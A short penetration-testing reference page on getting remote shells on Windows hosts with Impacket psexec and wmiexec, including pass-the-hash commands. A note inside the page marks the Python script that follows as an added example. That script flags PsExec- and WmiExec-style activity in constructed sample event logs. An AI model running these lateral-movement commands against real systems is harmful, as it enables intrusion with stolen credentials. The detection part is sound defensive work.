Login Windows Shell
Last modified: 2023-11-11
If we have credentials for the target Windows system, we can execute commands on it from a Linux machine.
Impacket PsExec
PsExec gives us an interactive shell on the Windows host.
impacket-psexec username:password@<target-ip>
# Pass the Hash
impacket-psexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d username@10.0.0.1
Impacket WmiExec
WmiExec uses Windows Management Instrumentation (WMI) to give us an interactive shell on the Windows host.
impacket-wmiexec example.local/username@10.0.0.1
# Pass the Hash
impacket-wmiexec -hashes abcdef0123456789abcdef0123456789:c2597747aa5e43022a3a3049a3c3b09d example.local/username@10.0.0.1
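
On the defending side, both tools leave recognisable traces on the Windows host. The following Python example is added here and is not part of the original page or of Impacket: it runs two detection heuristics over constructed, simplified event records. The record layout, the field names and both patterns (a randomly named 8-letter service binary in the Windows directory, and WmiPrvSE.exe spawning a command whose output is redirected to a `__<timestamp>` file on ADMIN$) are assumptions based on the commonly observed default behaviour of these tools.

```python
import re

# Constructed sample events (not real logs): simplified dicts modelled on
# System event 7045 (service installed) and process-creation records
# (Security 4688 / Sysmon 1). Field names are hypothetical.
SAMPLE_EVENTS = [
    {"id": 7045, "service": "BTOB", "image_path": r"%systemroot%\kQzLmWpa.exe"},
    {"id": 7045, "service": "WinDefend",
     "image_path": r"C:\Program Files\Windows Defender\MsMpEng.exe"},
    {"id": 4688, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1699700000.123456 2>&1"},
    {"id": 4688, "parent": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},
]

# Assumption: PsExec-style tooling drops a randomly named 8-letter executable
# into the Windows directory and registers it as a service.
SERVICE_BINARY = re.compile(r"^(%systemroot%|c:\\windows)\\[a-z]{8}\.exe$", re.I)
# Assumption: WmiExec-style tooling redirects command output to a
# "__<timestamp>" file on the ADMIN$ share.
WMI_REDIRECT = re.compile(r"\\\\[^\\\s]+\\ADMIN\$\\__\d+\.\d+", re.I)


def classify(event):
    """Return a finding label for one event, or None if nothing matches."""
    if event["id"] == 7045 and SERVICE_BINARY.match(event.get("image_path", "")):
        return "psexec-style service install"
    if event["id"] == 4688:
        parent = event.get("parent", "").lower()
        if parent.endswith("\\wmiprvse.exe") and WMI_REDIRECT.search(event.get("cmdline", "")):
            return "wmiexec-style command execution"
    return None


def scan(events):
    """Return (index, label) for every event that matches a heuristic."""
    return [(i, label) for i, e in enumerate(events) if (label := classify(e))]


if __name__ == "__main__":
    for index, label in scan(SAMPLE_EVENTS):
        print(f"event {index}: {label}")
```

Both patterns are heuristics: legitimate 8-letter binaries in the Windows directory can match the first one, so pair it with an allowlist of known services.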